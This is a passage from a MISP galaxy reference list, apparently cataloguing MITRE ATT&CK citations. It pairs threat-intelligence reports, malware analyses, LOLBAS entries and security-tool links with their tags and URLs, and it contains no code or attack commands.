fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="hexed osx.dok analysis 2019"

Table 14867. Table References

Links

http://www.hexed.in/2019/07/osxdok-analysis.html

malwarebyteslabs xcsset dubrobber

Thomas Reed. (2020, April 21). OSX.DubRobber. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="malwarebyteslabs xcsset dubrobber"

Table 14868. Table References

Links

https://blog.malwarebytes.com/detections/osx-dubrobber/

wardle evilquest partii

Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.

The tag is: misp-galaxy:references="wardle evilquest partii"

Table 14869. Table References

Links

https://objective-see.com/blog/blog_0x60.html

wardle evilquest parti

Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.

The tag is: misp-galaxy:references="wardle evilquest parti"

Table 14870. Table References

Links

https://objective-see.com/blog/blog_0x59.html

eset_osx_flashback

ESET. (2012, January 1). OSX/Flashback. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="eset_osx_flashback"

Table 14871. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/osx_flashback.pdf

CheckPoint Dok

Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="CheckPoint Dok"

Table 14872. Table References

Links

https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

Intego Shlayer Feb 2018

Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.

The tag is: misp-galaxy:references="Intego Shlayer Feb 2018"

Table 14873. Table References

Links

https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/

SensePost Outlook Forms

Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost Outlook Forms"

Table 14874. Table References

Links

https://sensepost.com/blog/2017/outlook-forms-and-shells/

SensePost Outlook Home Page

Stalmans, E. (2017, October 11). Outlook Home Page – Another Ruler Vector. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost Outlook Home Page"

Table 14875. Table References

Links

https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/

Outlook Today Home Page

Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.

The tag is: misp-galaxy:references="Outlook Today Home Page"

Table 14876. Table References

Links

https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

Recorded Future Beacon 2019

Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Recorded Future Beacon 2019"

Table 14877. Table References

Links

https://www.recordedfuture.com/identifying-cobalt-strike-servers/

FireEye APT33 Guardrail

Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="FireEye APT33 Guardrail"

Table 14878. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

Kubernetes Cloud Native Security

Kubernetes. (n.d.). Overview of Cloud Native Security. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes Cloud Native Security"

Table 14879. Table References

Links

https://kubernetes.io/docs/concepts/security/overview/

Apple Doco Archive Dynamic Libraries

Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Apple Doco Archive Dynamic Libraries"

Table 14880. Table References

Links

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

Apple Dev Dynamic Libraries

Apple. (2012, July 23). Overview of Dynamic Libraries. Retrieved September 7, 2023.

The tag is: misp-galaxy:references="Apple Dev Dynamic Libraries"

Table 14881. Table References

Links

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

Kubeflow Pipelines

The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubeflow Pipelines"

Table 14882. Table References

Links

https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/

TechNet RDP Gateway

Microsoft. (n.d.). Overview of Remote Desktop Gateway. Retrieved June 6, 2016.

The tag is: misp-galaxy:references="TechNet RDP Gateway"

Table 14883. Table References

Links

https://technet.microsoft.com/en-us/library/cc731150.aspx

CrowdStrike AQUATIC PANDA December 2021

Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.

The tag is: misp-galaxy:references="CrowdStrike AQUATIC PANDA December 2021"

Table 14884. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

OWASP Top 10 2017

OWASP. (2017, April 16). OWASP Top 10 2017 - The Ten Most Critical Web Application Security Risks. Retrieved February 12, 2019.

The tag is: misp-galaxy:references="OWASP Top 10 2017"

Table 14885. Table References

Links

https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/

OWASP Top 10

OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.

The tag is: misp-galaxy:references="OWASP Top 10"

Table 14886. Table References

Links

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

Debian Manual Maintainer Scripts

Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.

The tag is: misp-galaxy:references="Debian Manual Maintainer Scripts"

Table 14887. Table References

Links

https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact

GCP Packet Mirroring

Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="GCP Packet Mirroring"

Table 14888. Table References

Links

https://cloud.google.com/vpc/docs/packet-mirroring

Citizenlab Packrat 2015

Scott-Railton, J., et al. (2015, December 8). Packrat. Retrieved December 18, 2020.

The tag is: misp-galaxy:references="Citizenlab Packrat 2015"

Table 14889. Table References

Links

https://citizenlab.ca/2015/12/packrat-report/

GitHub Pacu

Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.

The tag is: misp-galaxy:references="GitHub Pacu"

Table 14890. Table References

Links

https://github.com/RhinoSecurityLabs/pacu

Pacu Detection Disruption Module

Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="Pacu Detection Disruption Module"

Table 14891. Table References

Links

https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detectiondisruption/main.py

Symantec Palmerworm Sep 2020

Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="Symantec Palmerworm Sep 2020"

Table 14892. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt

Apple PAM

Apple. (2011, May 11). PAM - Pluggable Authentication Modules. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Apple PAM"

Table 14893. Table References

Links

https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt

Man Pam_Unix

die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Man Pam_Unix"

Table 14894. Table References

Links

https://linux.die.net/man/8/pam_unix

Palo Alto PlugX June 2017

Lancaster, T. and Idrizovic, E.. (2017, June 27). Paranoid PlugX. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="Palo Alto PlugX June 2017"

Table 14895. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/

Unit42 PlugX June 2017

Lancaster, T., Idrizovic, E. (2017, June 27). Paranoid PlugX. Retrieved April 19, 2019.

The tag is: misp-galaxy:references="Unit42 PlugX June 2017"

Table 14896. Table References

Links

https://unit42.paloaltonetworks.com/unit42-paranoid-plugx/

Secuirtyinbits Ataware3 May 2019

Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.

The tag is: misp-galaxy:references="Secuirtyinbits Ataware3 May 2019"

Table 14897. Table References

Links

https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3

Dragos PARISITE

Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="Dragos PARISITE"

Table 14898. Table References

Links

https://www.dragos.com/threat/parisite/

DOJ Lazarus Sony 2018

Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.

The tag is: misp-galaxy:references="DOJ Lazarus Sony 2018"

Table 14899. Table References

Links

https://www.justice.gov/opa/press-release/file/1092091/download

intezer stripped binaries elf files 2018

Ignacio Sanmillan. (2018, February 7). Executable and Linkable Format 101. Part 2: Symbols. Retrieved September 29, 2022.

The tag is: misp-galaxy:references="intezer stripped binaries elf files 2018"

Table 14900. Table References

Links

https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/

Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass

Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass"

Table 14901. Table References

Links

https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191

Office 365 Delegated Administration

Microsoft. (n.d.). Partners: Offer delegated administration. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Office 365 Delegated Administration"

Table 14902. Table References

Links

https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us

Microsoft IFEOorMalware July 2015

Microsoft. (2015, July 30). Part of Windows 10 or really Malware?. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft IFEOorMalware July 2015"

Table 14903. Table References

Links

https://answers.microsoft.com/windows/forum/windows_10-security/part-of-windows-10-or-really-malware/af715663-a34a-423c-850d-2a46f369a54c

Circl Passive DNS

CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Circl Passive DNS"

Table 14904. Table References

Links

https://www.circl.lu/services/passive-dns/

ObjectiveSee AppleJeus 2019

Patrick Wardle. (2019, October 12). Pass the AppleJeus. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="ObjectiveSee AppleJeus 2019"

Table 14905. Table References

Links

https://objective-see.org/blog/blog_0x49.html

GentilKiwi Pass the Ticket

Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="GentilKiwi Pass the Ticket"

Table 14906. Table References

Links

http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos

Wikipedia Password cracking

Wikipedia. (n.d.). Password cracking. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Wikipedia Password cracking"

Table 14907. Table References

Links

https://en.wikipedia.org/wiki/Password_cracking

RDP Hijacking Korznikov

Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.

The tag is: misp-galaxy:references="RDP Hijacking Korznikov"

Table 14908. Table References

Links

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

ise Password Manager February 2019

ise. (2019, February 19). Password Managers: Under the Hood of Secrets Management. Retrieved January 22, 2021.

The tag is: misp-galaxy:references="ise Password Manager February 2019"

Table 14909. Table References

Links

https://www.ise.io/casestudies/password-manager-hacking/

Microsoft Password Complexity

Hall, J., Lich, B. (2017, September 9). Password must meet complexity requirements. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Microsoft Password Complexity"

Table 14910. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/password-must-meet-complexity-requirements

BlackHillsInfosec Password Spraying

Thyer, J. (2015, October 30). Password Spraying & Other Fun with RPCCLIENT. Retrieved April 25, 2017.

The tag is: misp-galaxy:references="BlackHillsInfosec Password Spraying"

Table 14911. Table References

Links

http://www.blackhillsinfosec.com/?p=4645

how_pwd_rev_enc_1

Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.

The tag is: misp-galaxy:references="how_pwd_rev_enc_1"

Table 14912. Table References

Links

http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html

how_pwd_rev_enc_2

Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.

The tag is: misp-galaxy:references="how_pwd_rev_enc_2"

Table 14913. Table References

Links

http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html

Volexity Patchwork June 2018

Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.

The tag is: misp-galaxy:references="Volexity Patchwork June 2018"

Table 14914. Table References

Links

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

PaloAlto Patchwork Mar 2018

Levene, B. et al.. (2018, March 7). Patchwork Continues to Deliver BADNEWS to the Indian Subcontinent. Retrieved March 31, 2018.

The tag is: misp-galaxy:references="PaloAlto Patchwork Mar 2018"

Table 14915. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/

Symantec Patchwork

Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Symantec Patchwork"

Table 14916. Table References

Links

http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries

Trend Micro Pawn Storm OAuth 2017

Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Trend Micro Pawn Storm OAuth 2017"

Table 14917. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

TrendMicro Pawn Storm 2019

Hacquebord, F. (n.d.). Pawn Storm in 2019 A Year of Scanning and Credential Phishing on High-Profile Targets. Retrieved December 29, 2020.

The tag is: misp-galaxy:references="TrendMicro Pawn Storm 2019"

Table 14918. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-pawn-storm-in-2019.pdf

TrendMicro Pawn Storm Dec 2020

Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.

The tag is: misp-galaxy:references="TrendMicro Pawn Storm Dec 2020"

Table 14919. Table References

Links

https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html

ClearSky Pay2Kitten December 2020

ClearSky. (2020, December 17). Pay2Key Ransomware – A New Campaign by Fox Kitten. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="ClearSky Pay2Kitten December 2020"

Table 14920. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf

PaypalScam

Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.

The tag is: misp-galaxy:references="PaypalScam"

Table 14921. Table References

Links

https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/

Pcalua.exe - LOLBAS Project

LOLBAS. (2018, May 25). Pcalua.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pcalua.exe - LOLBAS Project"

Table 14922. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pcalua/

pcodedmp Bontchev

Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="pcodedmp Bontchev"

Table 14923. Table References

Links

https://github.com/bontchev/pcodedmp

GitHub PcShare 2014

LiveMirror. (2014, September 17). PcShare. Retrieved October 11, 2022.

The tag is: misp-galaxy:references="GitHub PcShare 2014"

Table 14924. Table References

Links

https://github.com/LiveMirror/pcshare

Pcwrun.exe - LOLBAS Project

LOLBAS. (2018, May 25). Pcwrun.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pcwrun.exe - LOLBAS Project"

Table 14925. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/

Pcwutl.dll - LOLBAS Project

LOLBAS. (2018, May 25). Pcwutl.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pcwutl.dll - LOLBAS Project"

Table 14926. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/

Microsoft Peach Sandstorm September 14 2023

Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved January 31, 2024.

The tag is: misp-galaxy:references="Microsoft Peach Sandstorm September 14 2023"

Table 14927. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Microsoft Peach Sandstorm 2023

Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm password spray campaigns enable intelligence collection at high-value targets. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="Microsoft Peach Sandstorm 2023"

Table 14928. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/

Microsoft PEB 2021

Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Microsoft PEB 2021"

Table 14929. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb

Peirates GitHub

InGuardians. (2022, January 5). Peirates GitHub. Retrieved February 8, 2022.

The tag is: misp-galaxy:references="Peirates GitHub"

Table 14930. Table References

Links

https://github.com/inguardians/peirates

Pentesting AD Forests

García, C. (2019, April 3). Pentesting Active Directory Forests. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Pentesting AD Forests"

Table 14931. Table References

Links

https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019

U.S. CISA BlackTech September 27 2023

Cybersecurity and Infrastructure Security Agency. (2023, September 27). People’s Republic of China-Linked Cyber Actors Hide in Router Firmware. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="U.S. CISA BlackTech September 27 2023"

Table 14932. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-270a

U.S. CISA Volt Typhoon May 24 2023

Cybersecurity and Infrastructure Security Agency. (2023, May 24). People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved May 25, 2023.

The tag is: misp-galaxy:references="U.S. CISA Volt Typhoon May 24 2023"

Table 14933. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a

Joint Cybersecurity Advisory Volt Typhoon June 2023

NSA et al. (2023, May 24). People’s Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="Joint Cybersecurity Advisory Volt Typhoon June 2023"

Table 14934. Table References

Links

https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF

TechNet Firewall Design

Microsoft. (2004, February 6). Perimeter Firewall Design. Retrieved April 25, 2016.

The tag is: misp-galaxy:references="TechNet Firewall Design"

Table 14935. Table References

Links

https://technet.microsoft.com/en-us/library/cc700828.aspx

Oddvar Moe IFEO APR 2018

Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.

The tag is: misp-galaxy:references="Oddvar Moe IFEO APR 2018"

Table 14936. Table References

Links

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

Oddvar Moe RunOnceEx Mar 2018

Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.

The tag is: misp-galaxy:references="Oddvar Moe RunOnceEx Mar 2018"

Table 14937. Table References

Links

https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/

Xorrior Authorization Plugins

Chris Ross. (2018, October 17). Persistent Credential Theft with Authorization Plugins. Retrieved April 22, 2021.

The tag is: misp-galaxy:references="Xorrior Authorization Plugins"

Table 14938. Table References

Links

https://xorrior.com/persistent-credential-theft/

SpecterOps JXA 2020

Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14, 2021.

The tag is: misp-galaxy:references="SpecterOps JXA 2020"

Table 14939. Table References

Links

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

PersistentJXA_leopitt

Leo Pitt. (2020, August 6). Persistent JXA - A poor man’s Powershell for macOS. Retrieved January 11, 2021.

The tag is: misp-galaxy:references="PersistentJXA_leopitt"

Table 14940. Table References

Links

https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5

Pester.bat - LOLBAS Project

LOLBAS. (2018, May 25). Pester.bat. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pester.bat - LOLBAS Project"

Table 14941. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/pester/

TrendMicro PE_URSNIF.A2

Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro PE_URSNIF.A2"

Table 14942. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PE_URSNIF.A2?_ga=2.131425807.1462021705.1559742358-1202584019.1549394279

Volatility Phalanx2

Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Volatility Phalanx2"

Table 14943. Table References

Links

https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html

Prevailion EvilNum May 2020

Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021.

The tag is: misp-galaxy:references="Prevailion EvilNum May 2020"

Table 14944. Table References

Links

https://www.prevailion.com/phantom-in-the-command-shell-2/

ryhanson phishery SEPT 2016

Hanson, R. (2016, September 24). phishery. Retrieved July 21, 2018.

The tag is: misp-galaxy:references="ryhanson phishery SEPT 2016"

Table 14945. Table References

Links

https://github.com/ryhanson/phishery

GitHub Phishery

Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.

The tag is: misp-galaxy:references="GitHub Phishery"

Table 14946. Table References

Links

https://github.com/ryhanson/phishery

ANSSI Nobelium Phishing December 2021

ANSSI. (2021, December 6). PHISHING CAMPAIGNS BY THE NOBELIUM INTRUSION SET. Retrieved April 13, 2022.

The tag is: misp-galaxy:references="ANSSI Nobelium Phishing December 2021"

Table 14947. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf

Enigma Phishing for Credentials Jan 2015

Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="Enigma Phishing for Credentials Jan 2015"

Table 14948. Table References

Links

https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

KISA Operation Muzabi

KISA. (n.d.). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 7, 2022.

The tag is: misp-galaxy:references="KISA Operation Muzabi"

Table 14949. Table References

Links

https://www.boho.or.kr/krcert/publicationView.do?bulletin_writing_sequence=35936

Staaldraad Phishing with OAuth 2017

Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Staaldraad Phishing with OAuth 2017"

Table 14950. Table References

Links

https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

phobos_virustotal

Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="phobos_virustotal"

Table 14951. Table References

Links

https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection

Talos Remcos Aug 2018

Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="Talos Remcos Aug 2018"

Table 14952. Table References

Links

https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html

FireEye FIN6 Apr 2019

McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="FireEye FIN6 Apr 2019"

Table 14953. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

Picus Labs Proc cump 2022

Huseyin Can YUCEEL & Picus Labs. (2022, March 22). Retrieved March 31, 2023.

The tag is: misp-galaxy:references="Picus Labs Proc cump 2022"

Table 14954. Table References

Links

https://www.picussecurity.com/resource/the-mitre-attck-t1003-os-credential-dumping-technique-and-its-adversary-use

wired-pig butchering

Lily Hay Newman. (n.d.). ‘Pig Butchering’ Scams Are Now a $3 Billion Threat. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="wired-pig butchering"

Table 14955. Table References

Links

https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/

Malwarebytes Pikabot December 15 2023

Jérôme Segura. (2023, December 15). PikaBot distributed via malicious search ads. Retrieved January 11, 2023.

The tag is: misp-galaxy:references="Malwarebytes Pikabot December 15 2023"

Table 14956. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2023/12/pikabot-distributed-via-malicious-ads

Trustwave Pillowmint June 2020

Trustwave SpiderLabs. (2020, June 22). Pillowmint: FIN7’s Monkey Thief . Retrieved July 27, 2020.

The tag is: misp-galaxy:references="Trustwave Pillowmint June 2020"

Table 14957. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/

TechNet Ping

Microsoft. (n.d.). Ping. Retrieved April 8, 2016.

The tag is: misp-galaxy:references="TechNet Ping"

Table 14958. Table References

Links

https://technet.microsoft.com/en-us/library/bb490968.aspx

Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.

The tag is: misp-galaxy:references="Pass The Cookie"

Table 14959. Table References

Links

https://wunderwuzzi23.github.io/blog/passthecookie.html

Pktmon.exe - LOLBAS Project

LOLBAS. (2020, August 12). Pktmon.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Pktmon.exe - LOLBAS Project"

Table 14960. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pktmon/

Osanda Stealing NetNTLM Hashes

Osanda Malith Jayathissa. (2017, March 24). Places of Interest in Stealing NetNTLM Hashes. Retrieved January 26, 2018.

The tag is: misp-galaxy:references="Osanda Stealing NetNTLM Hashes"

Table 14961. Table References

Links

https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/

Microsoft PLATINUM June 2017

Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="Microsoft PLATINUM June 2017"

Table 14962. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/?source=mmpc

Microsoft PLATINUM April 2016

Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Microsoft PLATINUM April 2016"

Table 14963. Table References

Links

https://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

Forcepoint Felismus Mar 2017

Somerville, L. and Toro, A. (2017, March 30). Playing Cat & Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Forcepoint Felismus Mar 2017"

Table 14964. Table References

Links

https://blogs.forcepoint.com/security-labs/playing-cat-mouse-introducing-felismus-malware

Symantec Play Ransomware April 19 2023

Symantec Threat Hunter Team. (2023, April 19). Play Ransomware Group Using New Custom Data-Gathering Tools. Retrieved August 10, 2023.

The tag is: misp-galaxy:references="Symantec Play Ransomware April 19 2023"

Table 14965. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy

Trend Micro Play Playbook September 06 2022

Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares. (2022, September 6). Play Ransomware’s Attack Playbook Similar to that of Hive, Nokoyawa. Retrieved August 10, 2023.

The tag is: misp-galaxy:references="Trend Micro Play Playbook September 06 2022"

Table 14966. Table References

Links

https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html

Trend Micro Play Ransomware September 06 2022

